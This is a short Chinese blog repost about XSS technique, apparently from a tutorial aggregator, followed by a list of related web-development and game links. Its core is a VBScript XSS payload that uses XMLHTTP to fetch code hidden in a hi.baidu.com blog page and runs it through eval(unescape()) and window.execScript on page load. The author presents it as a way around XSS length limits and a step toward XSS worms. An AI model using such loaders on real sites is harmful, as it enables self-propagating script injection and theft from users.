一个有趣的Ajax Hack示范

灭火器小童鞋

灭火器小童鞋

2016-02-19 13:00

清醒时做事,糊涂时读书,大怒时睡觉,无聊时关注图老师为大家准备的精彩内容。下面为大家推荐一个有趣的Ajax Hack示范,无聊中的都看过来。
今天在梦之光芒的BLOG上看见了一个Ajax Hack示范,其实跨站发现很容易,但是要做到大危害还是很难,偷偷COOKIE什么的只针对用户而已,XSS WORM的那种利用才是可怕的。

来看看他的一段VBSCRIPT脚本

代码如下:
vbscript:execute(" 
dim l,s: 
l=chr(13)+chr(10): 
s=""sub mycode""&l: 
s=s&""dim http,url,pg,p,p2,cd,ht,o""&l: 
s=s&""url=""""http://hi.baidu.com/monyer/blog/item/83b70ed71b5095dda044df67.html""""""&l: 
s=s&""set http=createobject(""""Microsoft.XMLHTTP"""")""&l: 
s=s&""http.open """"get"""",url,false""&l: 
s=s&""http.send("""""""")""&l: 
s=s&""pg=http.responseText""&l: 
s=s&""p=instr(1,pg,""""ILOVEUNING-BEGIN"""")""&l: 
s=s&""if p=null or p1 then exit sub""&l: 
s=s&""p=instr(p,pg,chr(37))""&l: 
s=s&""if p=null or p1 then exit sub""&l: 
s=s&""p2=instr(p,pg,chr(60))""&l: 
s=s&""cd=mid(pg,p,p2-p)""&l: 
s=s&""ht=""""eval(unescape('""""&cd&""""'))""""""&l: 
s=s&""window.execScript ht,""""jscript""""""&l: 
s=s&""end sub""&l: 
execute(s): 
document.body.onload=getref(""mycode""): 
") 
调用代码在 http://hi.baidu.com/monyer/blog/item/83b70ed71b5095dda044df67.html
这样就实现了本站调用代码,换个思路,是否这就解决了Ajax Hack常用的的提交数据限制(站外提交没有权限,XSS代码长度限制)的问题,呵呵~这里我也没实验。

再还有一个思路就是剑心的分片写入脚本再eval出来~这两个思路结合起来,也许我们就能在苛刻的XSS漏洞上创造奇迹!
展开更多 50%)
分享

猜你喜欢

一个有趣的Ajax Hack示范

Web开发
一个有趣的Ajax Hack示范

一个Ajax类

Web开发
一个Ajax类

s8lol主宰符文怎么配

英雄联盟 网络游戏
s8lol主宰符文怎么配

一个针对IE7的CSS Hack

Web开发
一个针对IE7的CSS Hack

一个封装的Ajax类

Web开发
一个封装的Ajax类

lol偷钱流符文搭配推荐

英雄联盟 网络游戏
lol偷钱流符文搭配推荐

一个AJAX类代码

Web开发
一个AJAX类代码

一个简单的AJAX请求类

Web开发
一个简单的AJAX请求类

lolAD刺客新符文搭配推荐

英雄联盟
lolAD刺客新符文搭配推荐

Ajax乱码问题整理

Ajax乱码问题整理

经典Java开发工具介绍(5):WebGain Studio 4 with VisualCafé

经典Java开发工具介绍(5):WebGain Studio 4 with VisualCafé
下拉加载更多内容 ↓